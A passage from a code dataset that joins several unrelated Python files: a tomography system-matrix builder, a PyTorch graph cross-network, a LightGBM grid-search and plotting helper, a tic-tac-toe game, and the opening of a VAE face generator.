SIAM, Philadelphia, 2001.\r\n \r\n\r\n import numpy as np\r\n from scipy.sparse import csr_matrix\r\n \r\n N = args[0]\r\n\r\n \r\n # Default value of d.\r\n if len(args) < 4:\r\n d = np.sqrt(2)*N\r\n else:\r\n d = args[3]\r\n \r\n # Default value of the number of rays.\r\n if len(args) < 3:\r\n p = int(round(np.sqrt(2)*N))\r\n else:\r\n p = args[2]\r\n\r\n # Default value of the angles theta.\r\n if len(args) < 2:\r\n theta = np.matrix(np.arange(0.,180.))\r\n else:\r\n theta = args[1]\r\n\r\n\r\n # Define the number of angles.\r\n nA = theta.shape[1]\r\n\r\n # The starting values both the x and the y coordinates. \r\n x0 = np.matrix(np.linspace(-d/2,d/2,p)).T\r\n y0 = np.matrix(np.zeros([p,1]))\r\n\r\n # The intersection lines.\r\n x = np.matrix(np.arange(-N/2,N/2 + 1)).T\r\n y = np.copy(x)\r\n\r\n # Initialize vectors that contains the row numbers, the column numbers and\r\n # the values for creating the matrix A effiecently.\r\n rows = np.matrix(np.zeros([2*N*nA*p,1]))\r\n cols = np.copy(rows)\r\n vals = np.copy(rows)\r\n idxend = 0\r\n\r\n\r\n # Loop over the chosen angles.\r\n for i in range(0,nA):\r\n \r\n # All the starting points for the current angle.\r\n x0theta = np.cos(np.deg2rad(theta[0,i]))*x0-np.sin(np.deg2rad(theta[0,i]))*y0\r\n y0theta = np.sin(np.deg2rad(theta[0,i]))*x0+np.cos(np.deg2rad(theta[0,i]))*y0\r\n \r\n # The direction vector for all the rays corresponding to the current \r\n # angle.\r\n a = -np.sin(np.deg2rad(theta[0,i]))\r\n b = np.cos(np.deg2rad(theta[0,i]))\r\n \r\n # Loop over the rays.\r\n for j in range(0,p):\r\n \r\n # Use the parametrisation of line to get the y-coordinates of\r\n # intersections with x = k, i.e. x constant.\r\n tx = (x - x0theta[j,0])/a\r\n yx = b*tx + y0theta[j,0]\r\n \r\n # Use the parametrisation of line to get the x-coordinates of\r\n # intersections with y = k, i.e. y constant.\r\n ty = (y - y0theta[j,0])/b\r\n xy = a*ty + x0theta[j,0] \r\n \r\n # Collect the intersection times and coordinates. \r\n t = np.vstack([tx, ty])\r\n xxy = np.vstack([x, xy])\r\n yxy = np.vstack([yx, y])\r\n \r\n # Sort the coordinates according to intersection time.\r\n I = np.argsort(t,0)\r\n xxy = xxy[I]\r\n yxy = yxy[I] \r\n \r\n # Skip the points outside the box.\r\n I1 = np.logical_and(np.array(xxy) >= -N/2 , np.array(xxy) <= N/2)\r\n I2 = np.logical_and(np.array(yxy) >= -N/2 , np.array(yxy) <= N/2)\r\n I = np.squeeze(np.logical_and(I1,I2))\r\n #I = (xxy >= -N/2 & xxy <= N/2 & yxy >= -N/2 & yxy <= N/2)\r\n xxy = np.squeeze(xxy[I])\r\n yxy = np.squeeze(yxy[I])\r\n \r\n # Skip double points.\r\n I = np.logical_and(abs(np.diff(xxy)) <= 1e-10 , abs(np.diff(yxy)) <= 1e-10)\r\n if np.not_equal(I.size, 0):\r\n I = np.concatenate((I, np.matrix([False])), axis=1)\r\n xxy = xxy[~I]\r\n yxy = yxy[~I]\r\n# xxy = np.delete(xxy,I)\r\n# yxy = np.delete(yxy,I)\r\n \r\n # Calculate the length within cell and determines the number of\r\n # cells which is hit.\r\n d = np.sqrt(np.power(np.diff(xxy),2) + np.power(np.diff(yxy),2))\r\n numvals = d.shape[1]\r\n \r\n # Store the values inside the box.\r\n if numvals > 0:\r\n \r\n # If the ray is on the boundary of the box in the top or to the\r\n # right the ray does not by definition lie with in a valid cell.\r\n if not ((b == 0 and abs(y0theta[j,0] - N/2) < 1e-15) or (a == 0 and abs(x0theta[j,0] - N/2) < 1e-15)):\r\n \r\n # Calculates the midpoints of the line within the cells.\r\n xm = 0.5*(xxy[0,0:-1]+xxy[0,1:]) + N/2\r\n ym = 0.5*(yxy[0,0:-1]+yxy[0,1:]) + N/2\r\n \r\n # Translate the midpoint coordinates to index.\r\n col = np.floor(xm)*N + (N - np.floor(ym)) - 1\r\n \r\n # Create the indices to store the values to vector for\r\n # later creation of A matrix.\r\n idxstart = idxend\r\n idxend = idxstart + numvals\r\n idx = np.arange(idxstart,idxend)\r\n \r\n # Store row numbers, column numbers and values. \r\n rows[idx,0] = i*p + j\r\n cols[idx,0] = col[0,:]\r\n vals[idx,0] = d \r\n\r\n\r\n # Truncate excess zeros.\r\n rows = rows[0:idxend]\r\n cols = cols[0:idxend]\r\n vals = vals[0:idxend]\r\n \r\n # Create sparse matrix A from the stored values.\r\n A = csr_matrix((vals[:,0].astype(np.float), (np.squeeze(np.array(rows[:,0]).astype(int)), np.squeeze(np.array(cols[:,0]).astype(int)))), dtype=np.float, shape=(p*nA, N**2)).toarray()\r\n\r\n \r\n return [A,theta,p,d]\r\n\r\nimport numpy as np\r\nN=8\r\ntheta = np.matrix([45.0000, 67.5000, 90.0000, 112.5000, 135.0000, 157.5000, 180.0000, 202.5000, 225.0000, 247.5000, 270.0000, 292.5000, 315.0000])\r\n[A,theta,p,d] = paralleltomo(N,theta,11)\r\n\r\nnp.linalg.matrix_rank(A)\r\n\r\nN=200\r\ntheta =np.matrix(np.linspace(0,179,179))\r\np = 250\r\n[A,theta,p,d] = paralleltomo(N,theta,p)\r\n","repo_name":"npeuker/MathModellingDTU","sub_path":"Exam Project/paralleltomo.py","file_name":"paralleltomo.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39378918420","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef spec_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef spac_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -1.).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef normalize_adj_torch(mx):\n mx = mx.to_dense()\n rowsum = mx.sum(1)\n r_inv_sqrt = torch.pow(rowsum, -0.5).flatten()\n r_inv_sqrt[torch.isinf(r_inv_sqrt)] = 0.\n r_mat_inv_sqrt = torch.diag(r_inv_sqrt)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n mx = torch.transpose(mx, 0, 1)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n return mx\n\n\nclass MLP(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=bias)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, x):\n x_fts = self.fc(x)\n if self.bias is not None:\n x_fts += self.bias\n return self.act(x_fts)\n\n\nclass GCN_MI(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, A, x, sparse=False):\n x_fts = self.fc(x)\n if sparse:\n out = torch.unsqueeze(torch.spmm(A, torch.squeeze(x_fts, 0)), 0)\n else:\n out = torch.bmm(A.unsqueeze(0), x_fts.unsqueeze(0))\n if self.bias is not None:\n out += self.bias\n return self.act(out).squeeze(0)\n\n\nclass GCN(nn.Module):\n\n def __init__(self, in_dim, out_dim):\n super(GCN, self).__init__()\n self.proj = nn.Linear(in_dim, out_dim)\n self.drop = nn.Dropout(p=0.3)\n\n def forward(self, A, X, act=None):\n X = self.drop(X)\n X = torch.matmul(A, X)\n X = self.proj(X)\n if act is not None:\n X = act(X)\n return X\n\n\nclass Discriminator(nn.Module):\n def __init__(self, n_h):\n super().__init__()\n self.f_k = nn.Bilinear(n_h, n_h, 1)\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Bilinear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, c, h_pl, h_mi, s_bias1=None, s_bias2=None):\n c_x = c\n sc_1 = torch.squeeze(self.f_k(h_pl, c_x), -2)\n sc_2 = torch.squeeze(self.f_k(h_mi, c_x), -2)\n if s_bias1 is not None:\n sc_1 += s_bias1\n if s_bias2 is not None:\n sc_2 += s_bias2\n\n logits = torch.cat((sc_1, sc_2), 0).squeeze(-1)\n v = logits.shape[0]\n\n return logits, logits[:v//2]\n\n\nclass GraphCrossnet(nn.Module):\n def __init__(self, ks, in_dim, out_dim, dim=48, cross_weight=1.0, fuse_weight=1.0, R=1, cross_layer=2):\n super(GraphCrossnet, self).__init__()\n self.ks = ks\n self.cs_w = cross_weight\n self.fs_w = fuse_weight\n self.cs_l = cross_layer\n\n self.start_gcn_s1 = GCN(in_dim, dim)\n self.start_gcn_s2 = GCN(dim, dim)\n self.end_gcn = GCN(2*dim, out_dim)\n\n self.index_select_s1 = IndexSelect(ks[0], dim, act='prelu', R=R)\n self.index_select_s2 = IndexSelect(ks[1], dim, act='prelu', R=R)\n self.pool_s12_start = GraphPool(dim)\n self.pool_s23_start = GraphPool(dim)\n self.unpool_s21_end = GraphUnpool(dim)\n self.unpool_s32_end = GraphUnpool(dim)\n\n self.s1_l1 = GCN(dim, dim)\n self.s1_l2 = GCN(dim, dim)\n self.s1_l3 = GCN(dim, dim)\n self.s2_l1 = GCN(dim, dim)\n self.s2_l2 = GCN(dim, dim)\n self.s2_l3 = GCN(dim, dim)\n self.s3_l1 = GCN(dim, dim)\n self.s3_l2 = GCN(dim, dim)\n self.s3_l3 = GCN(dim, dim)\n\n if self.cs_l>=1:\n self.pool_s12_1 = GraphPool(dim, g=True)\n self.unpool_s21_1 = GraphUnpool(dim)\n self.pool_s23_1 = GraphPool(dim, g=True)\n self.unpool_s32_1 = GraphUnpool(dim)\n if self.cs_l>=2:\n self.pool_s12_2 = GraphPool(dim, g=True)\n self.unpool_s21_2 = GraphUnpool(dim)\n self.pool_s23_2 = GraphPool(dim, g=True)\n self.unpool_s32_2 = GraphUnpool(dim)\n\n def forward(self, A, x):\n\n A_s1 = A\n x_s1 = self.start_gcn_s1(A_s1, x)\n x_org = x_s1\n x_s1_ = torch.zeros_like(x_s1)\n x_s1_ = x_s1[torch.randperm(x_s1.shape[0]),:]\n ret_s1, value_s1, idx_s1, idx_s1_, Xdown_s1 = self.index_select_s1(x_s1, x_s1_, A_s1) \n x_s2, A_s2 = self.pool_s12_start(A_s1, x_s1, idx_s1, idx_s1_, value_s1, initlayer=True)\n\n x_s2 = self.start_gcn_s2(A_s2, x_s2)\n x_s2_ = torch.zeros_like(x_s2)\n x_s2_ = x_s2[torch.randperm(x_s2.shape[0]),:]\n ret_s2, value_s2, idx_s2, idx_s2_, Xdown_s2 = self.index_select_s2(x_s2, x_s2_, A_s2)\n x_s3, A_s3 = self.pool_s23_start(A_s2, x_s2, idx_s2, idx_s2_, value_s2, initlayer=True)\n\n res_s1_0, res_s2_0, res_s3_0 = x_s1, x_s2, x_s3\n\n x_s1 = self.s1_l1(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l1(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l1(A_s3, x_s3, F.relu)\n\n res_s1_1, res_s2_1, res_s3_1 = x_s1, x_s2, x_s3\n\n if self.cs_l >= 1:\n x_s12_fu = self.pool_s12_1(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_1(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_1(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_1(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * x_s21_fu + res_s1_0\n x_s2 = x_s2 + self.cs_w * (x_s12_fu + x_s32_fu)/2 + res_s2_0\n x_s3 = x_s3 + self.cs_w * x_s23_fu + res_s3_0\n\n x_s1 = self.s1_l2(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l2(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l2(A_s3, x_s3, F.relu)\n\n if self.cs_l >= 2:\n x_s12_fu = self.pool_s12_2(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_2(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_2(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_2(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * 0.05 * x_s21_fu\n x_s2 = x_s2 + self.cs_w * 0.05 * (x_s12_fu + x_s32_fu)/2\n x_s3 = x_s3 + self.cs_w * 0.05 * x_s23_fu\n\n x_s1 = self.s1_l3(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l3(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l3(A_s3, x_s3, F.relu)\n \n x_s3_out = self.unpool_s32_end(A_s2, x_s3, idx_s2) + Xdown_s2\n x_s2_out = self.unpool_s21_end(A_s1, x_s2 + x_s3_out, idx_s1)\n x_agg = x_s1 + x_s2_out * self.fs_w + Xdown_s1 * self.fs_w\n x_agg = torch.cat([x_agg, x_org], 1)\n x_agg = self.end_gcn(A_s1, x_agg)\n\n return x_agg, ret_s1, ret_s2\n\n\nclass IndexSelect(nn.Module):\n\n def __init__(self, k, n_h, act, R=1):\n super().__init__()\n self.k = k\n self.R = R\n self.sigm = nn.Sigmoid()\n self.fc = MLP(n_h, n_h, act)\n self.disc = Discriminator(n_h)\n self.gcn1 = GCN(n_h, n_h)\n\n def forward(self, seq1, seq2, A, samp_bias1=None, samp_bias2=None):\n h_1 = self.fc(seq1)\n h_2 = self.fc(seq2)\n h_n1 = self.gcn1(A, h_1)\n\n X = self.sigm(h_n1)\n ret, ret_true = self.disc(X, h_1, h_2, samp_bias1, samp_bias2)\n scores = self.sigm(ret_true).squeeze()\n num_nodes = A.shape[0]\n values, idx = torch.topk(scores, int(num_nodes))\n values1, idx1 = values[:int(self.k*num_nodes)], idx[:int(self.k*num_nodes)]\n values0, idx0 = values[int(self.k*num_nodes):], idx[int(self.k*num_nodes):]\n\n return ret, values1, idx1, idx0, h_n1\n\n\nclass GraphPool(nn.Module):\n\n def __init__(self, in_dim, g=False):\n super(GraphPool, self).__init__()\n self.g = g\n if self.g:\n self.down_gcn = GCN(in_dim, in_dim)\n \n def forward(self, A, X, idx, idx_=None, value=None, initlayer=False):\n if self.g:\n X = self.down_gcn(A, X)\n\n new_x = X[idx,:]\n score = torch.unsqueeze(value, -1)\n new_x = torch.mul(new_x, score)\n\n if initlayer:\n A = self.removeedge(A, idx)\n return new_x, A\n else:\n return new_x\n\n def removeedge(self, A, idx):\n A_ = A[idx,:]\n A_ = A_[:,idx]\n return A_\n\n \n\nclass GraphUnpool(nn.Module):\n\n def __init__(self, in_dim):\n super(GraphUnpool, self).__init__()\n self.up_gcn = GCN(in_dim, in_dim)\n\n def forward(self, A, X, idx):\n\n new_X = torch.zeros([A.shape[0], X.shape[1]]).to(X.device)\n new_X[idx] = X\n new_X = self.up_gcn(A, new_X)\n return new_X","repo_name":"limaosen0/GXN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"22483337693","text":"\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\nfrom lightgbm import LGBMClassifier\r\nimport lightgbm as lgb\r\nfrom toad.metrics import KS, F1, AUC\r\n\r\nfrom sklearn.metrics import roc_curve\r\nimport pandas as pd\r\nimport numpy as np\r\nimport logging\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.charts import Bar, Grid, Line\r\n# 日志管理\r\nlogger_name = \"lgbm\"\r\nlogger = logging.getLogger(logger_name)\r\nlogger.setLevel(logging.DEBUG)\r\nlogger.info('test')\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\n\r\ndef init_feature(x_train, y_train):\r\n X, Y = x_train, y_train\r\n lgbm_model = LGBMClassifier(\r\n learning_rate=0.05,\r\n n_estimators=500,\r\n max_depth=4,\r\n min_split_gain=0.01,\r\n min_child_samples=20,\r\n subsample=1,\r\n colsample_bytree=1,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_param = lgbm_model.get_params()\r\n lgbm_train = lgb.Dataset(X, Y)\r\n lgbm_param.pop('silent')\r\n lgbm_param.pop('n_estimators')\r\n\r\n '''使用交叉验证的方式确定最优的树数量'''\r\n cvresult = lgb.cv(lgbm_param, lgbm_train, num_boost_round=100, nfold=4, metrics=['auc','binary_logloss'], early_stopping_rounds=100)\r\n best_n_estimators = len(cvresult['auc-mean'])\r\n print('确定最优的树数量', best_n_estimators)\r\n\r\n lgbm_model.set_params(n_estimators=best_n_estimators)\r\n # lgbm_model.fit(X,Y,eval_metric='auc')\r\n lgbm_model.fit(X, Y, eval_metric=['auc', 'binary_logloss'])\r\n\r\n feat_imp = pd.Series(lgbm_model.feature_importances_, index=X.columns)\r\n feat_imp = feat_imp.sort_values(ascending=False)\r\n\r\n valid_feature_num = len(np.where(feat_imp > 0)[0]) # 有效变量是有feature_importance的变量(在lgbm树模型中有贡献的变量,其他的变量没有用到)\r\n print('有效变量数为{0}个'.format(valid_feature_num))\r\n\r\n return feat_imp\r\n\r\n\r\n\r\n# from sklearn import svm, datasets\r\n# from sklearn.model_selection import GridSearchCV\r\n# iris = datasets.load_iris()\r\n# parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}\r\n# svc = svm.SVC()\r\n# clf = GridSearchCV(svc, parameters,scoring='roc_auc',cv=4)\r\n# clf.fit(iris.data[0:100], iris.target[0:100])\r\nparameters={'num_leaves':[i for i in range(10,50,1)],\r\n 'max_depth':[2,3,4,5,6],\r\n 'learning_rate':[0.001,0.003,0.005]+[i/100 for i in range(1,11)],\r\n 'n_estimators':range(100,500,2),\r\n 'min_split_gain':[i/100 for i in range(0,10,1)],\r\n 'min_child_weight':[0.001,0.003,0.005,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09],\r\n 'min_child_samples':[i for i in range(10,50,1)],\r\n 'subsample':[i/10 for i in range(6,11)],\r\n 'colsample_bytree':[i/10 for i in range(6,11)],\r\n 'reg_alpha':[i/100 for i in range(0,200,1)],\r\n 'reg_lambda':[i/10 for i in range(70,200,1)]\r\n }\r\n\r\ndef grid_search(parameters,x_train, x_test, y_train, y_test):\r\n best_auc = 0\r\n for num_leaves in parameters['num_leaves']:\r\n for max_depth in parameters['max_depth']:\r\n for learning_rate in parameters['learning_rate']:\r\n for n_estimators in parameters['n_estimators']:\r\n # for min_split_gain in parameters['min_split_gain']:\r\n # for min_child_weight in parameters['min_child_weight']:\r\n # for min_child_samples in parameters['min_child_samples']:\r\n # for subsample in parameters['subsample']:\r\n # for colsample_bytree in parameters['colsample_bytree']:\r\n # for reg_alpha in parameters['reg_alpha']:\r\n # for reg_lambda in parameters['reg_lambda']:\r\n # logger.info('{},{},{},{},{},{},{},{},{},{},{}'.format(num_leaves,\r\n # max_depth,\r\n # learning_rate,\r\n # n_estimators,\r\n # min_split_gain,\r\n # min_child_weight,\r\n # min_child_samples,\r\n # subsample,\r\n # colsample_bytree,\r\n # reg_alpha,\r\n # reg_lambda\r\n # ))\r\n lgbm_model = LGBMClassifier(\r\n num_leaves=num_leaves,\r\n max_depth=max_depth,\r\n learning_rate=learning_rate,\r\n n_estimators=n_estimators,\r\n # min_split_gain=min_split_gain,\r\n # min_child_weight=min_child_weight,\r\n # min_child_samples=min_child_samples,\r\n # subsample=subsample,\r\n # colsample_bytree=colsample_bytree,\r\n # reg_alpha=reg_alpha,\r\n # reg_lambda=reg_lambda,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_model.fit(x_train, y_train, eval_metric='auc')\r\n preds = lgbm_model.predict(x_test)\r\n auc = AUC(preds,y_test)\r\n if auc>best_auc:\r\n best_auc = auc\r\n logger.info('test auc:{}'.format(best_auc))\r\n best_para = lgbm_model.get_params()\r\n return best_para\r\n\r\n\r\n\r\ndef py_overlap(feature,cut_list,train_cnt_rate,oot_cnt_rate,train_due_rate,oot_due_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_rate\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_rate\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n\r\n line = (\r\n Line()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_due\",\r\n train_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_due\",\r\n oot_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n )\r\n\r\n overlap_1 = bar.overlap(line)\r\n overlap_1.render_notebook()\r\n return overlap_1\r\n\r\n\r\n\r\n\r\n\r\ndef xw_bar(feature,cut_list,train_cnt_rate,oot_cnt_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return bar\r\n\r\n\r\n\r\ndef xw_line(feature,cut_list,train_due_rate,oot_due_rate):\r\n line = (\r\n Line()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return line\r\n\r\n","repo_name":"xingweihappyer/credit-card","sub_path":"lgbm_tuner.py","file_name":"lgbm_tuner.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40309053165","text":"from print_board import *\nfrom random import randrange\nfrom functools import partial\ntext = partial(print, sep='', end=\"\\n\\n\")\n\ndef play(board, turn, u_icon, b_icon, round, bot):\n\n choice = ''\n\n print_board(board, round)\n\n if turn == \"user\":\n\n good = False\n while not good:\n good = True\n text(bot,\": Your turn! Which place (0-8) would you like to play?\")\n choice = input(\"--> \")\n if choice not in board or (choice == 'X' or choice == 'O' or not choice):\n text(bot,\": That's not an option, sorry.\")\n good = False\n\n board[board.index(choice)] = u_icon\n \n else:\n \n while choice not in board: # while choice is not an option\n choice = str(randrange(0,8)) # generate choice (0-8)\n text(bot,\": My turn! I'll pick... \",choice,\"!\")\n\n board[board.index(choice)] = b_icon\n\n return check_for_win(board)\n\ndef check_for_win(board):\n\n # check for horizontal win\n i = 0\n while i < 9: # look through rows 0-2, 3-5, and 6-8\n if board[i] == board[i + 1] and board[i] == board[i + 2]:\n return board[i]\n i += 3\n\n # check for vertical win\n i = 0\n while i < 3: # look through columns 0;3;6, 1;4;7, and 2;5;8\n if board[i] == board[i + 3] and board[i] == board[i + 6]:\n return board[i]\n i += 1\n\n # check for diagonal win\n if board[0] == board[4] and board[0] == board[8]:\n return board[0]\n elif board[2] == board[4] and board[2] == board[6]:\n return board[2]\n\n for b in board:\n if b is not 'X' and b is not 'O':\n return '' # return blank if no winner yet and there are still open spaces\n\n return 'C' # return C if no winner yet and there are NOT still open spaces","repo_name":"meganmcadams/tik-tac-toe","sub_path":"Sources/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7021341509","text":"# -*- encoding: utf-8 -*-\n'''\n@Author : {Yixu}\n@Contact : {xiyu111@mail.ustc.edu.cn}\n@Software: PyCharm\n@File : VAE_Genarate_face.py\n@Time : 6/11/2019 7:05 PM\n'''\n'''\nuse gan is not good,this time use vae,may use fullconnect to de\n'''\n\nfrom read_data import read_img\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,4,5\"\n\n\nclass VAE_net(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE_net, self).__init__() # jiche fathers Attribute\n\t\tlatent_size = 64\n\t\tn_channel = 3\n\t\tn_feature = 128\n\t\tLATENT_CODE_NUM = 64 # for VAE latne\n\n\t\tself.Decoder_net = nn.Sequential(nn.ConvTranspose2d(latent_size, 4 * n_feature, kernel_size=4, bias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(4 * n_feature), # input 64*1*1\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(4 * n_feature, 2 * n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(2 * n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(2 * n_feature, n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature, n_feature // 2, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 2),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 2, n_feature // 4, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 4),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 4, n_channel, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.Sigmoid(), # output 3*128*128\n\t\t\t\t\t\t\t\t\t\t ).cuda()\n\n\t\tself.Encoder_cal_u = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_o = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_add_u_o = nn.Linear(LATENT_CODE_NUM, 64 * 1 * 1).cuda() #???\n\n\t\tself.Encoder_net = nn.Sequential(\n\t\t\tnn.Conv2d(n_channel, n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(n_feature), # input 128*128*3\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(2 * 